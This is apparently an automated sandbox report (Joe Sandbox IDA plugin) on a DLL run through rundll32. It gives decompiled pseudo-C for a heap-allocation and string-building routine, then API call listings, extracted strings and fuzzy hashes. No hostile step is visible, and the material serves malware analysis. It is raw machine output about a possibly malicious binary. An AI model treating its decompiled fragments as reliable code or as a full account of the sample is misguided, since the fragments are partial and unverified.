                                                                                                                                                                                      			E6E9D10A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                      				long _v44;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				void* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                      				long _v64;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                      				void* _t50;
                                                                                                                                                                                      				void* _t51;
                                                                                                                                                                                      				intOrPtr _t54;
                                                                                                                                                                                      				long _t62;
                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                      				void* _t84;
                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t78 = __esi;
                                                                                                                                                                                      				_t76 = __edi;
                                                                                                                                                                                      				_t59 = __ebx;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t85 = _t84 - 0x30;
                                                                                                                                                                                      				_v32 = _t85;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E3950;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_t45 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      				if(_t45 != 0) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t46 = HeapAlloc(_t45, 0, 0xf);
                                                                                                                                                                                      					if(_t46 == 0) {
                                                                                                                                                                                      						goto L18;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						asm("movsd xmm0, [0x6ea1da37]");
                                                                                                                                                                                      						asm("movsd xmm1, [0x6ea1da30]");
                                                                                                                                                                                      						_v40 = _t46;
                                                                                                                                                                                      						asm("movsd [eax+0x7], xmm0");
                                                                                                                                                                                      						asm("movsd [eax], xmm1");
                                                                                                                                                                                      						_t50 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                      							L7:
                                                                                                                                                                                      							_t51 = HeapAlloc(_t50, 0, 0x10);
                                                                                                                                                                                      							if(_t51 == 0) {
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								asm("movsd xmm0, [0x6ea1da47]");
                                                                                                                                                                                      								asm("movsd xmm1, [0x6ea1da3f]");
                                                                                                                                                                                      								_t71 = 0;
                                                                                                                                                                                      								_t59 = 0x10;
                                                                                                                                                                                      								_v52 = _t51;
                                                                                                                                                                                      								_v48 = 0x10;
                                                                                                                                                                                      								asm("movsd [eax+0x8], xmm0");
                                                                                                                                                                                      								asm("movsd [eax], xmm1");
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									_v44 = _t59;
                                                                                                                                                                                      									if(_t71 > 0xf) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t17 = _t71 + 1; // 0x1
                                                                                                                                                                                      									_t76 = _t71 + _t17;
                                                                                                                                                                                      									_t78 = _t59 - _t76;
                                                                                                                                                                                      									if(_t78 < 0) {
                                                                                                                                                                                      										_v20 = 0;
                                                                                                                                                                                      										E6E9F9300(_t59, _t76, _t59, _t76, _t78, __eflags);
                                                                                                                                                                                      										asm("ud2");
                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t59 == _v48) {
                                                                                                                                                                                      											_v36 = _t71;
                                                                                                                                                                                      											_v56 = _t78;
                                                                                                                                                                                      											_v60 = _t76;
                                                                                                                                                                                      											_v20 = 0;
                                                                                                                                                                                      											_v64 = _t59;
                                                                                                                                                                                      											E6E9F9280( &_v52, _t59);
                                                                                                                                                                                      											_t51 = _v52;
                                                                                                                                                                                      											_t59 = _v64;
                                                                                                                                                                                      											_t71 = _v36;
                                                                                                                                                                                      											_t76 = _v60;
                                                                                                                                                                                      											_t78 = _v56;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t10 = _t76 + 1; // 0x1
                                                                                                                                                                                      										_v36 = _t71 + 1;
                                                                                                                                                                                      										_t81 = _t51;
                                                                                                                                                                                      										E6E9ED4D0(_t51 + _t10, _t51 + _t76, _t78);
                                                                                                                                                                                      										_t71 = _v36;
                                                                                                                                                                                      										_t51 = _t81;
                                                                                                                                                                                      										_t85 = _t85 + 0xc;
                                                                                                                                                                                      										 *((char*)(_t81 + _t76)) = 0;
                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v20 = 0;
                                                                                                                                                                                      								_v36 = _t51;
                                                                                                                                                                                      								E6E9EBE30(_v40, _a4, _a8, _t51, _a16);
                                                                                                                                                                                      								__eflags = _v48;
                                                                                                                                                                                      								if(_v48 != 0) {
                                                                                                                                                                                      									HeapFree( *0x6ea2e128, 0, _v36);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _v40);
                                                                                                                                                                                      								_t54 = _v28;
                                                                                                                                                                                      								 *[fs:0x0] = _t54;
                                                                                                                                                                                      								return _t54;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t50 = GetProcessHeap();
                                                                                                                                                                                      							if(_t50 == 0) {
                                                                                                                                                                                      								L19:
                                                                                                                                                                                      								_t62 = 0x10;
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *0x6ea2e128 = _t50;
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t45 = GetProcessHeap();
                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						_t62 = 0xf;
                                                                                                                                                                                      						L20:
                                                                                                                                                                                      						E6E9F92F0(_t59, _t62, 1, _t76, _t78, __eflags);
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						__eflags =  &_a8;
                                                                                                                                                                                      						E6E9D1000(_v52, _v48);
                                                                                                                                                                                      						return E6E9D1000(_v40, 0xf);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *0x6ea2e128 = _t45;
                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L21:
                                                                                                                                                                                      			}


























                                                                                                                                                                                      0x6e9d10a0
                                                                                                                                                                                      0x6e9d10a0
                                                                                                                                                                                      0x6e9d10a0
                                                                                                                                                                                      0x6e9d10a3
                                                                                                                                                                                      0x6e9d10a4
                                                                                                                                                                                      0x6e9d10a5
                                                                                                                                                                                      0x6e9d10a6
                                                                                                                                                                                      0x6e9d10a9
                                                                                                                                                                                      0x6e9d10ac
                                                                                                                                                                                      0x6e9d10b3
                                                                                                                                                                                      0x6e9d10c4
                                                                                                                                                                                      0x6e9d10c7
                                                                                                                                                                                      0x6e9d10cd
                                                                                                                                                                                      0x6e9d10d4
                                                                                                                                                                                      0x6e9d10e8
                                                                                                                                                                                      0x6e9d10ed
                                                                                                                                                                                      0x6e9d10f4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d10fa
                                                                                                                                                                                      0x6e9d10fa
                                                                                                                                                                                      0x6e9d1102
                                                                                                                                                                                      0x6e9d110a
                                                                                                                                                                                      0x6e9d110d
                                                                                                                                                                                      0x6e9d1112
                                                                                                                                                                                      0x6e9d1116
                                                                                                                                                                                      0x6e9d111d
                                                                                                                                                                                      0x6e9d1131
                                                                                                                                                                                      0x6e9d1136
                                                                                                                                                                                      0x6e9d113d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d1143
                                                                                                                                                                                      0x6e9d1143
                                                                                                                                                                                      0x6e9d114b
                                                                                                                                                                                      0x6e9d1153
                                                                                                                                                                                      0x6e9d1155
                                                                                                                                                                                      0x6e9d115a
                                                                                                                                                                                      0x6e9d115d
                                                                                                                                                                                      0x6e9d1164
                                                                                                                                                                                      0x6e9d1169
                                                                                                                                                                                      0x6e9d1192
                                                                                                                                                                                      0x6e9d1195
                                                                                                                                                                                      0x6e9d1198
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d119a
                                                                                                                                                                                      0x6e9d119a
                                                                                                                                                                                      0x6e9d11a0
                                                                                                                                                                                      0x6e9d11a2
                                                                                                                                                                                      0x6e9d1235
                                                                                                                                                                                      0x6e9d123c
                                                                                                                                                                                      0x6e9d1241
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d11a8
                                                                                                                                                                                      0x6e9d11ab
                                                                                                                                                                                      0x6e9d11ad
                                                                                                                                                                                      0x6e9d11b5
                                                                                                                                                                                      0x6e9d11b8
                                                                                                                                                                                      0x6e9d11bb
                                                                                                                                                                                      0x6e9d11c2
                                                                                                                                                                                      0x6e9d11c5
                                                                                                                                                                                      0x6e9d11ca
                                                                                                                                                                                      0x6e9d11cd
                                                                                                                                                                                      0x6e9d11d0
                                                                                                                                                                                      0x6e9d11d3
                                                                                                                                                                                      0x6e9d11d6
                                                                                                                                                                                      0x6e9d11d6
                                                                                                                                                                                      0x6e9d1171
                                                                                                                                                                                      0x6e9d1175
                                                                                                                                                                                      0x6e9d117e
                                                                                                                                                                                      0x6e9d1180
                                                                                                                                                                                      0x6e9d1185
                                                                                                                                                                                      0x6e9d1188
                                                                                                                                                                                      0x6e9d118a
                                                                                                                                                                                      0x6e9d118d
                                                                                                                                                                                      0x6e9d1191
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d1191
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d11a2
                                                                                                                                                                                      0x6e9d11db
                                                                                                                                                                                      0x6e9d11e5
                                                                                                                                                                                      0x6e9d11f2
                                                                                                                                                                                      0x6e9d11fa
                                                                                                                                                                                      0x6e9d11fe
                                                                                                                                                                                      0x6e9d120b
                                                                                                                                                                                      0x6e9d120b
                                                                                                                                                                                      0x6e9d121b
                                                                                                                                                                                      0x6e9d1220
                                                                                                                                                                                      0x6e9d1223
                                                                                                                                                                                      0x6e9d1230
                                                                                                                                                                                      0x6e9d1230
                                                                                                                                                                                      0x6e9d111f
                                                                                                                                                                                      0x6e9d111f
                                                                                                                                                                                      0x6e9d1126
                                                                                                                                                                                      0x6e9d124a
                                                                                                                                                                                      0x6e9d124a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d112c
                                                                                                                                                                                      0x6e9d112c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d112c
                                                                                                                                                                                      0x6e9d1126
                                                                                                                                                                                      0x6e9d111d
                                                                                                                                                                                      0x6e9d10d6
                                                                                                                                                                                      0x6e9d10d6
                                                                                                                                                                                      0x6e9d10dd
                                                                                                                                                                                      0x6e9d1243
                                                                                                                                                                                      0x6e9d1243
                                                                                                                                                                                      0x6e9d124f
                                                                                                                                                                                      0x6e9d1254
                                                                                                                                                                                      0x6e9d1259
                                                                                                                                                                                      0x6e9d1264
                                                                                                                                                                                      0x6e9d126d
                                                                                                                                                                                      0x6e9d1283
                                                                                                                                                                                      0x6e9d10e3
                                                                                                                                                                                      0x6e9d10e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9d10e3
                                                                                                                                                                                      0x6e9d10dd
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9D10D6
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,0000000F), ref: 6E9D10ED
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(02A40000,00000000,0000000F), ref: 6E9D111F
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,00000010,02A40000,00000000,0000000F), ref: 6E9D1136
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000010,02A40000,00000000,0000000F), ref: 6E9D120B
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000010,02A40000,00000000,0000000F), ref: 6E9D121B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                      • String ID: Control_RunDLL$Control_RunDLL
                                                                                                                                                                                      • API String ID: 2113670309-2490747307
                                                                                                                                                                                      • Opcode ID: 78b95e32d6d59a58c86e75d71d2a16fc1c235b476bb369ce7613fb3b66ac8dcb
                                                                                                                                                                                      • Instruction ID: 344404a78bbd0775cd307bf01330f6882ae3a57adc0f410e1b4e99e6136a4fe0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 78b95e32d6d59a58c86e75d71d2a16fc1c235b476bb369ce7613fb3b66ac8dcb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19518B75D00B299BDB01CFE5C840BEEBBB9EF9A304F108529E9147B640D771A845CFA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EEF57
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6E9EEF5F
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EEFE8
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6E9EF013
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EF068
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: bd2440c7599199bd4768a60fb338d50315030edeaf74400ceccafb2033756743
                                                                                                                                                                                      • Instruction ID: 1ffdaa79a08766bf05e75fa7e2baaf0c01b37cc997c0d0faa847d9699db46372
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd2440c7599199bd4768a60fb338d50315030edeaf74400ceccafb2033756743
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41B334A10209DFCF01CFA8C880ADEBBB9BF45328F148865E914AB795D731D946CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6EA2E114), ref: 6E9E2994
                                                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 6E9E29AA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9E29C4
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,0000000C), ref: 6E9E29DB
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E114), ref: 6E9E2A18
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6E9E2A38
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                                                                                                                                                                                      • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
                                                                                                                                                                                      • API String ID: 3228198226-3009553730
                                                                                                                                                                                      • Opcode ID: 57ba07781c639c29bbd23c91fcf74f6d967c1bc9f46c75724240da4a50381283
                                                                                                                                                                                      • Instruction ID: d909d689bfa5c90a62ad57087daa01989322c0db103c0c03be96dddfea4a26fa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 57ba07781c639c29bbd23c91fcf74f6d967c1bc9f46c75724240da4a50381283
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E4157B190034A8FDB11CFE4D855BAEBBB4FF45318F148129D619AB780DB749885CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,6E9F43C9,FFFDC801,00000400,?,00000000,00000001,?,6E9F4542,00000021,FlsSetValue,6EA26BF8,6EA26C00,?), ref: 6E9F437D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                                                                      • Opcode ID: 0555316ccff2f83fbf21c3eb394363c3463911088ed98a9768460ae91c7d9665
                                                                                                                                                                                      • Instruction ID: 28a487c21a6ba24e86f33e6c44d2c3607a7d631ffe92a4e6023aa077f2d1f3dc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0555316ccff2f83fbf21c3eb394363c3463911088ed98a9768460ae91c7d9665
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0210876A45611EFDB119BA5DE40E8A376CAF43364F194520ED15BB280DB70E903CFD0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(00000001,?,6E9EF101,6E9ECFA2,6E9EC7AC,?,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8,0000000C,6E9ECADD), ref: 6E9EF3CD
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9EF3DB
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9EF3F4
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8,0000000C,6E9ECADD,?,00000001,?), ref: 6E9EF446
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: 7c4214a6ebeade0669265e43d05489b91759203f35bb897c5666a0b913dc4fc6
                                                                                                                                                                                      • Instruction ID: c0f6d0b07c8ddf970c80541233748c336f61c250a1fe5c08a6b83009f2c98797
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c4214a6ebeade0669265e43d05489b91759203f35bb897c5666a0b913dc4fc6
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE016D7310DB119DAB612AF67C4C55A36ACDF5737D330022BEA10642D5FF42C8038E80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9EC510: GetTickCount64.KERNEL32 ref: 6E9EC517
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBE96
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBEB4
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBECD
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBECF
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBED6
                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6E9EBEF4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Count64Tick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1927824332-0
                                                                                                                                                                                      • Opcode ID: f5b466110fc698a85c4d7762e04354ee762cc00c60867c208b1dd87043a6da46
                                                                                                                                                                                      • Instruction ID: 5f89fe14493ba06d1ef4618cf30142cf3b62051c2728c86830ffb08196c525c5
                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b466110fc698a85c4d7762e04354ee762cc00c60867c208b1dd87043a6da46
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501D613C24F188DD213B979A84111AA67C6FE73E0B19C753D1463A005FF9044E34AD2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • {invalid syntax}, xrefs: 6E9D6B84
                                                                                                                                                                                      • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D6B54
                                                                                                                                                                                      • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6E9D6BAA, 6E9D6BE5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                      • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                                                                                                                                                                                      • API String ID: 3839614884-2364648981
                                                                                                                                                                                      • Opcode ID: 5a6d0097d096ac20da771449ba4a4db1be0ee7e187d67349be937cc64d2cd192
                                                                                                                                                                                      • Instruction ID: 47f13096d41d37f2ec7a0a974dddb8be082cf7bfb92659c327e887452f66a505
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a6d0097d096ac20da771449ba4a4db1be0ee7e187d67349be937cc64d2cd192
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41883571C6204BD3149AB8C840B7AB7D9DFD5704F108C3EE9899F3C2E668C859CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD00B
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000001,6E9DC746), ref: 6E9DD023
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DD043
                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000), ref: 6E9DD063
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DD076
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,0000000C), ref: 6E9DD089
                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000,02A40000,00000000,0000000C), ref: 6E9DD0B6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
